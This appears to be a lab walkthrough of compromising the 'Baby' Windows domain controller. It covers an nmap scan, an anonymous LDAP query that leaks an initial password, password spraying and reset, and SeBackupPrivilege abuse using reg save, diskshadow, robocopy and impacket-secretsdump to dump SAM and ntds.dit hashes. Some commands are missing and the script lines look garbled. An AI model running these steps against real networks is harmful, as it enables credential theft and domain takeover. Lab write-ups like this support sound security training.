Not shown: 65514 filtered tcp ports (no-response) PORT STATE SERVICE REASON VERSION 53/tcp open domain syn-ack ttl 127 Simple DNS Plus 88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-03-06 14:47:47Z) 135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn 389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? syn-ack ttl 127 464/tcp open kpasswd5? syn-ack ttl 127 636/tcp open tcpwrapped syn-ack ttl 127 3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped syn-ack ttl 127 3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services | ssl-cert: Subject: commonName=BabyDC.baby.vl | Issuer: commonName=BabyDC.baby.vl | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2025-03-05T14:31:02 | Not valid after: 2025-09-04T14:31:02 | MD5: 48f2:c223:e5c4:356d:b768:8571:f1c6:8950 | SHA-1: 03fd:ff73:d5e1:92bd:32bf:d747:c3fb:bb46:ff4e:6d2d |_ssl-date: 2025-03-06T14:49:20+00:00; -2h00m00s from scanner time. | rdp-ntlm-info: | Target_Name: BABY | NetBIOS_Domain_Name: BABY | NetBIOS_Computer_Name: BABYDC | DNS_Domain_Name: baby.vl | DNS_Computer_Name: BabyDC.baby.vl | DNS_Tree_Name: baby.vl | Product_Version: 10.0.20348 |_ System_Time: 2025-03-06T14:48:39+00:00 5357/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Service Unavailable 5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing 49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49668/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49674/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 49675/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 55620/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 59532/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Host script results: | p2p-conficker: | Checking for Conficker.C or higher... | Check 1 (port 29424/tcp): CLEAN (Timeout) | Check 2 (port 15632/tcp): CLEAN (Timeout) | Check 3 (port 18953/udp): CLEAN (Timeout) | Check 4 (port 41352/udp): CLEAN (Timeout) |_ 0/4 checks are positive: Host is CLEAN or ports are blocked | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required |_clock-skew: mean: -2h00m00s, deviation: 0s, median: -2h00m00s | smb2-time: | date: 2025-03-06T14:48:41 |_ start_date: N/A
FOOTHOLD
LDAP
After some enumeration we found that ldap had null session active
After running a query on the hole ldap with the below command we found that one user had a description field with a initial password BabyStart123!. We will try to use that password for the user teresa.bell and if it doesn’t work we will spray it to the rest of the users
1 2 3 4 5 6 7 8 9
# Teresa Bell, it, baby.vl dn: CN=Teresa Bell,OU=it,DC=baby,DC=vl objectClass: top objectClass: person objectClass: organizationalPerson objectClass: user cn: Teresa Bell sn: Bell description: Set initial password to BabyStart123!
The creds we found for Teresa.Bell but they dont work, so we will gather all of the users and password spray. We gathered the account names threw the below search BUT it was not the correct way:
The flag STATUS_PASSWORD_MUST_CHANGE tells us that we first need to change the password before we are able to log in to that user.Using the smbpasswd tool we were able to change Carolines password to Password123!
1
smbpasswd -r 10.10.114.53 -U 'Caroline.Robinson'
We can check if we have winrm access using the below command
The user we got has the SeBackupPrivilege flag anabled Now we can copy the sam and system hive of HKLM and crack them lockaly
Create a temp directory:
1
mkdir C:\temp
Copy the sam and system hive of HKLM to C:\temp and then download them.
1
reg save hklm\sam C:\temp\sam.hive
and
1
reg save hklm\system C:\temp\system.hive
Go on the temp folder and download the system and the sam
1
download sam.hive
1
download system.hive
Finally use impacket-secretsdump and obtain the ntlm hashes:
1
impacket-secretsdump -sam sam.hive -system system.hive LOCAL
Now we can login using evil-winrm and get the root flag
NTDS.DIT
We can see that we cannon log into the machine as the hash we got is for the local administrator. We have to get the hash of the account in the domain (which has exactly the same name). In order to do this, we have to grab “ntds.dit” aswell
Using this script to copy the ntds.dit (xct script)
1 2 3 4 5 6 7 8 9
# save this in script.txt set metadata C:\Windows\Temp\meta.cabX set context clientaccessibleX set context persistentX begin backupX add volume C: alias cdriveX createX expose %cdrive% E:X end backupX
Then we will run the below commands to get the ntds.dit from the “snapshot” we made
1 2
# run diskshadow diskshadow /s script.txt # copy ntds to c robocopy /b E:\Windows\ntds . ntds.dit
After downloading the ntds.dit to our local machine and run secretsdump again
1
impacket-secretsdump -sam sam.hive -system system.hive -ntds ntds.dit LOCAL
.png)
